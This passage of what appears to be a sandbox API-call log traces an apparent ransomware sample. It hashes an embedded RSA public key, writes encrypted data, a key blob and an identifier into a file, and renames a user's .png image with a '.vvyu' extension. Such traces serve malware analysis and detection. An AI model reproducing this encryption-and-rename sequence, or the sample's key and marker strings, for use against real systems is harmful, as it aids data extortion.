KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.017] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.017] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.017] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eaa30) returned 1 [0193.018] CryptCreateHash (in: hProv=0x6eaa30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.018] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.018] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.018] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.019] GetLastError () returned 0x0 [0193.019] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.019] CryptReleaseContext (hProv=0x6eaa30, dwFlags=0x0) returned 1 [0193.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.019] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.019] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.019] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc5f0) returned 0x2d47778 [0193.019] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41da0 [0193.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dd8 [0193.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41de8 [0193.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39df0 [0193.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e20 [0193.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e80 [0193.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e38 [0193.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.020] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0193.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0193.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0193.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e80 [0193.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0193.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e38 [0193.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39e20 [0193.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0193.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0193.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0193.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0193.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0193.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0193.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0193.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.024] GetCurrentThreadId () returned 0x264 [0193.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45790 [0193.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0193.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0193.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.024] GetCurrentThreadId () returned 0x264 [0193.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0193.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e80 [0193.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e20 [0193.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0193.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e38 [0193.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e08 [0193.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e98 [0193.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0193.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e68 [0193.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e50 [0193.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39eb0 [0193.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e50 [0193.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0193.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0193.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0193.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e20 [0193.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0193.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0193.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0193.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0193.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0193.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0193.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41de8 | out: hHeap=0x6a0000) returned 1 [0193.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.036] WriteFile (in: hFile=0x584, lpBuffer=0x2d47778*, nNumberOfBytesToWrite=0xc5e3, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d47778*, lpNumberOfBytesWritten=0x30ffb14*=0xc5e3, lpOverlapped=0x0) returned 1 [0193.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47778 | out: hHeap=0x6a0000) returned 1 [0193.037] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc5e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.037] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.039] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.039] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.039] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.039] CloseHandle (hObject=0x584) returned 1 [0193.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0193.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d47778 [0193.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0193.041] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\TYpweac9t_MP.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\typweac9t_mp.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\TYpweac9t_MP.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\typweac9t_mp.png.vvyu")) returned 1 [0193.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47778 | out: hHeap=0x6a0000) returned 1 [0193.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.043] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0193.045] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5712430, ftCreationTime.dwHighDateTime=0x1d89f0e, ftLastAccessTime.dwLowDateTime=0x4587f780, ftLastAccessTime.dwHighDateTime=0x1d89f23, ftLastWriteTime.dwLowDateTime=0x4587f780, 